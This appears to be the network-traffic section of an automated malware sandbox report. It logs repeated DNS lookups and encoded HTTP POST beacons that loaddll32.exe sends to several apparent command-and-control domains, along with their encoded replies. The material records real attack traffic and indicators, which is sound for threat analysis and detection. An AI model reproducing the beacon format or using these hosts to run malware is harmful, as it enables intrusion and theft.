                                          Sep 27, 2021 20:26:21.708801985 CEST8.8.8.8192.168.2.70xa76Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:22.167949915 CEST8.8.8.8192.168.2.70x466No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:22.951903105 CEST8.8.8.8192.168.2.70x53b6No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:22.955353975 CEST8.8.8.8192.168.2.70x7a15Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:23.635545015 CEST8.8.8.8192.168.2.70xd20fNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:23.715049982 CEST8.8.8.8192.168.2.70x6a7eName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:24.508251905 CEST8.8.8.8192.168.2.70x9b3bName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:24.589466095 CEST8.8.8.8192.168.2.70x453aNo error (0)lendbiz.vn103.28.36.212A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:25.375384092 CEST8.8.8.8192.168.2.70x3b7dName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:25.998867989 CEST8.8.8.8192.168.2.70x8590No error (0)lendbiz.vn103.28.36.212A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:26.173239946 CEST8.8.8.8192.168.2.70x992eName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:26.961611032 CEST8.8.8.8192.168.2.70xfeacName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:27.560750008 CEST8.8.8.8192.168.2.70xfa21No error (0)lendbiz.vn103.28.36.212A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:27.738198042 CEST8.8.8.8192.168.2.70x2aaName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:28.503357887 CEST8.8.8.8192.168.2.70x8f26Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:28.813460112 CEST8.8.8.8192.168.2.70x8c90No error (0)lendbiz.vn103.28.36.212A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:29.346869946 CEST8.8.8.8192.168.2.70x7eabName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:30.032093048 CEST8.8.8.8192.168.2.70x3c23No error (0)lendbiz.vn103.28.36.212A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:30.117753983 CEST8.8.8.8192.168.2.70x84d6Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:30.926594019 CEST8.8.8.8192.168.2.70xc32Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:31.333245039 CEST8.8.8.8192.168.2.70xb007No error (0)lendbiz.vn103.28.36.212A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:31.706501007 CEST8.8.8.8192.168.2.70xf59bName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:32.493242025 CEST8.8.8.8192.168.2.70xde6Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:33.290030003 CEST8.8.8.8192.168.2.70x7889Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:34.101382017 CEST8.8.8.8192.168.2.70x5b34Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:34.882970095 CEST8.8.8.8192.168.2.70x6794Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:35.861495018 CEST8.8.8.8192.168.2.70x3f6Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:37.436501026 CEST8.8.8.8192.168.2.70x9487Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:39.235862017 CEST8.8.8.8192.168.2.70x5074Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:40.133714914 CEST8.8.8.8192.168.2.70x6e95Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:40.944011927 CEST8.8.8.8192.168.2.70x49c9Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:41.798176050 CEST8.8.8.8192.168.2.70x466bName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:45.599760056 CEST8.8.8.8192.168.2.70x8974Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:46.371422052 CEST8.8.8.8192.168.2.70x5395Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:47.175295115 CEST8.8.8.8192.168.2.70x7728Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:47.936333895 CEST8.8.8.8192.168.2.70x575cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:48.726948023 CEST8.8.8.8192.168.2.70x3d0Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:49.514455080 CEST8.8.8.8192.168.2.70x9832Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:50.284754992 CEST8.8.8.8192.168.2.70xab34Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:51.046055079 CEST8.8.8.8192.168.2.70x127bName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:51.814224958 CEST8.8.8.8192.168.2.70xa24aName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:52.581841946 CEST8.8.8.8192.168.2.70xa0dbName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:53.363605022 CEST8.8.8.8192.168.2.70xd59bName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:55.205689907 CEST8.8.8.8192.168.2.70xfc2eName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:56.010369062 CEST8.8.8.8192.168.2.70x6bebName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:56.772144079 CEST8.8.8.8192.168.2.70x23d5Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:57.551357031 CEST8.8.8.8192.168.2.70xf177Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:58.317310095 CEST8.8.8.8192.168.2.70x1cb2Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:59.100308895 CEST8.8.8.8192.168.2.70xb21fName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:59.884588957 CEST8.8.8.8192.168.2.70x829bName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:00.696050882 CEST8.8.8.8192.168.2.70x9009Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:01.475539923 CEST8.8.8.8192.168.2.70x2bd3Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:02.263926029 CEST8.8.8.8192.168.2.70x20e5Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:03.041388988 CEST8.8.8.8192.168.2.70x6be0Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:03.835410118 CEST8.8.8.8192.168.2.70xc972Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:04.610857964 CEST8.8.8.8192.168.2.70x5e5aName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:05.386045933 CEST8.8.8.8192.168.2.70xd82eName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:06.145781994 CEST8.8.8.8192.168.2.70xaa85Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:06.948333979 CEST8.8.8.8192.168.2.70x4462Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:07.711954117 CEST8.8.8.8192.168.2.70xd1bdName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:08.476635933 CEST8.8.8.8192.168.2.70x874cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:09.280138016 CEST8.8.8.8192.168.2.70xb876Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:10.087430954 CEST8.8.8.8192.168.2.70x8171Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:10.857237101 CEST8.8.8.8192.168.2.70xb8a8Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:11.631730080 CEST8.8.8.8192.168.2.70x2b76Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:12.430803061 CEST8.8.8.8192.168.2.70xf6e7Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:13.226983070 CEST8.8.8.8192.168.2.70xc17aName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:13.996356964 CEST8.8.8.8192.168.2.70xbf1cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:14.775722027 CEST8.8.8.8192.168.2.70xa512Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:15.573328972 CEST8.8.8.8192.168.2.70xa5c0Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:16.355988026 CEST8.8.8.8192.168.2.70x97ffName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:17.133666039 CEST8.8.8.8192.168.2.70x85a3Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:17.933006048 CEST8.8.8.8192.168.2.70x88e5Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:18.690586090 CEST8.8.8.8192.168.2.70xaac1Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:19.865675926 CEST8.8.8.8192.168.2.70xbc6fName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:20.679677963 CEST8.8.8.8192.168.2.70xaab9Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:21.478529930 CEST8.8.8.8192.168.2.70x2098Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:22.242212057 CEST8.8.8.8192.168.2.70xbcbbName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:23.040184975 CEST8.8.8.8192.168.2.70x5f23Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:23.810910940 CEST8.8.8.8192.168.2.70xcd2aName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:24.605662107 CEST8.8.8.8192.168.2.70xdd12Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:25.397234917 CEST8.8.8.8192.168.2.70x16d4Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:26.651721001 CEST8.8.8.8192.168.2.70xd6e4Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:28.377547979 CEST8.8.8.8192.168.2.70x4f05Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:29.148997068 CEST8.8.8.8192.168.2.70x4806Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:29.947721004 CEST8.8.8.8192.168.2.70x493eName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:30.757169962 CEST8.8.8.8192.168.2.70x8e55Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:31.544518948 CEST8.8.8.8192.168.2.70x509Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:32.305871964 CEST8.8.8.8192.168.2.70x1e02Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:33.108398914 CEST8.8.8.8192.168.2.70x8a56Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:33.922348976 CEST8.8.8.8192.168.2.70x67fcName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:34.697350979 CEST8.8.8.8192.168.2.70x958cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:35.480268002 CEST8.8.8.8192.168.2.70x4b1aName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:37.276654959 CEST8.8.8.8192.168.2.70xb448Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:38.043040991 CEST8.8.8.8192.168.2.70x3aadName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:38.822201967 CEST8.8.8.8192.168.2.70x834cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:39.621783972 CEST8.8.8.8192.168.2.70xc895Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:40.682873011 CEST8.8.8.8192.168.2.70x17Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:41.443505049 CEST8.8.8.8192.168.2.70x6290Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:42.583395004 CEST8.8.8.8192.168.2.70xcab3Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:43.385703087 CEST8.8.8.8192.168.2.70xfa04Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:44.257919073 CEST8.8.8.8192.168.2.70xf4b3Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:47.095489979 CEST8.8.8.8192.168.2.70xf868Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:47.902513027 CEST8.8.8.8192.168.2.70x63f5Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:48.684627056 CEST8.8.8.8192.168.2.70x4b69Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • hoteloaktree.com
                                          • sirifinco.com
                                          • mohsinkhanfoundation.com
                                          • lendbiz.vn

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.749746185.67.1.9480C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:46.195082903 CEST985OUTPOST /QthLWsZsVgb/OQsaDixzHTgtfjMcGypGenN5Yn59cmV+YXw= HTTP/1.1
                                          Host: hoteloaktree.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.749747162.215.253.1480C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:46.823128939 CEST987OUTPOST /Urbhq9wO50j/ASk5Kx0SPR8lJjE5eTg9GkN6dX1le310YXlkfA== HTTP/1.1
                                          Host: sirifinco.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:46.965917110 CEST988INHTTP/1.1 406 Not Acceptable
                                          Date: Mon, 27 Sep 2021 18:25:46 GMT
                                          Server: Apache
                                          Content-Length: 226
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 6f 74 20 41 63 63 65 70 74 61 62 6c 65 21 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 41 63 63 65 70 74 61 62 6c 65 21 3c 2f 68 31 3e 3c 70 3e 41 6e 20 61 70 70 72 6f 70 72 69 61 74 65 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 54 68 69 73 20 65 72 72 6f 72 20 77 61 73 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 4d 6f 64 5f 53 65 63 75 72 69 74 79 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                          Data Ascii: <head><title>Not Acceptable!</title></head><body><h1>Not Acceptable!</h1><p>An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.</p></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          10192.168.2.749770107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:54.234761000 CEST1356OUTPOST /pcQLeLMbur/EgwSFkZ6c3lifn1yZX5hfA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:54.640748024 CEST1358INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:54 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 65 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+eEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          11192.168.2.749772107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:54.981651068 CEST1366OUTPOST /pcQLeLMbur/CXwgNgIIIXMeeQkPPhYCOUN6dX1le310YXlkfA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:55.383945942 CEST1367INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:55 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 65 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+eUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          12192.168.2.749774107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:55.893393993 CEST1376OUTPOST /pcQLeLMbur/fSkCegETcg8VKw95Qn12eWR6endleGV7 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:56.286302090 CEST1377INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:55 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 65 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
